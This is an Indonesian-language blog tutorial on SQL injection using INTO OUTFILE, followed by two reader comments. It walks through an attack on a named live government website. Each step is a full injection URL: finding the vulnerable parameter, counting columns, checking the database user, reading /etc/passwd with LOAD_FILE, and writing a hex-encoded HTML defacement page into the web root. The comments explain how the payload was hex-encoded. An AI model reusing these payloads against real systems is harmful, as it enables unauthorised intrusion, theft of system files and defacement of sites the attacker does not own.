SQL Into Outfile
Tutorial SQL Into Outfile
Perhatian : Ini hanya sekedar sharing ilmu ( Konten Sensitif 18+ )
Oke,assalamualaikum Wr.Wb
Saya disini akan memberikan tutorial sederhana bagaimana caranya SQL Into Outfile.
Sambil saya memberikan tutorial alangkah lebih baik nya saya mengsimulasikan ini dengan live target: cews.bmkg.go.id
Langsung kita gass menggunakan Apk Anon Hackbar aja ya biar enak hehe:V
#Cari celah
Cari celah website vulnerability terhadap sql injection donk pastinya dengan menambahkan single quote 1 ( ') dibelakang parameter
Error menandakan vuln |
#Cari jumlah kolom
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'order+by+8--+-
Jadi diketahui jumlah kolom nya ada 8 |
#Cari angka ajaib
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,5,6,7,8--+-
Nah angka ajaib nya 5 |
#Cek user
Masukan user() pada angka ajaib
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,user(),6,7,8--+-
Nah jika user nya root maka tandanya vuln into outfile |
#Cari path upload
Masukan LOAD_FILE('/etc/passwd') pada angka ajaib
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8--+-
Nah path nya E:\WWW\DISEMINASI_TERKINI\ |
Note: pada path ubah dari miring kiri ke miring kanan,contoh:
E:/WWW/DISEMINASI_TERKINI/
#Eksekusi
User nya root,path nya udah dapet,ya tinggal eksekusi mwehehe
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e6962622e636f2f5932544e3254502f32303230303432332d3230353733342e6a7067273e2c3c62723e2c3c68313e416b626172204665617420416e696e64613c2f68313e2c3c62723e2c3c68323e5765204c6f766520496e6a656374696f6e7320546f204578706c6f69743c2f68323e2c3c62723e2c3c617564696f206175746f706c61793d226175746f706c61792220636f6e74726f6c733d22636f6e74726f6c73227372633d2268747470733a2f2f632e746f7034746f702e696f2f6d5f3135333367377a3230302e6d70332220747970653d22617564696f2f6d706567223e3c2f617564696f3e2c3c68353e20436f707972696768742041574e2047616e73203c2f68353e3c2f63656e7465723e,6,7,8+INTO+OUTFILE'E:/WWW/sundaxploit01.html'--+-
Mas itu masukin script nya gmana biar kaya gitu pake nomer?
BalasHapusCode html nya di encode ke hex mas,sama seperti cara membuat dios sql-i
Hapus